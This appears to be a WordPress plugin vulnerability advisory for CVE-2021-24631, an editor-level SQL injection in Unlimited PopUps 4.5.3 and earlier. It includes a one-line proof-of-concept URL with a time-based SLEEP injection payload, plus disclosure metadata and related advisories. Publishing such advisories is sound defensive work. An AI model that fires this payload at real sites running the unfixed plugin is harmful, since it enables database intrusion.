Unlimited PopUps <= 4.5.3 – Author+ SQL Injection | CVE 2021-24631 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape the did GET parameter before using it in a SQL statement, available to users as low as editor, leading to an authenticated SQL Injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/unlimited-popups/trunk/popuplist.php#L16

https://example.com/wp-admin/admin.php?page=popup&info=del&did=1%20AND%20(SELECT%204420%20FROM%20(SELECT(SLEEP(5)))yVXX)

Affects Plugins

unlimited-popups

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-unlimited-popups/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

9841176d-1d37-4636-9144-0ca42b6f3605

Timeline

Publicly Published

2021-10-07 (about 4 years ago)

Added

2021-10-07 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2024-11-04

Title

Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons < 24.0.4 - Unauthenticated SQL Injection

Published

2021-03-16

Title

wpDataTables < 3.4.2 - Blind SQL Injection via start Parameter

Published

2025-05-21

Title

Binary MLM Plan < 5.0 - Unauthenticated SQL Injection

Published

2023-06-19

Title

MStore API < 3.9.8 - Unauthenticated Blind SQLi

Published

2023-04-13

Title

Cyr to Lat < 3.7 - Editor+ SQL Injection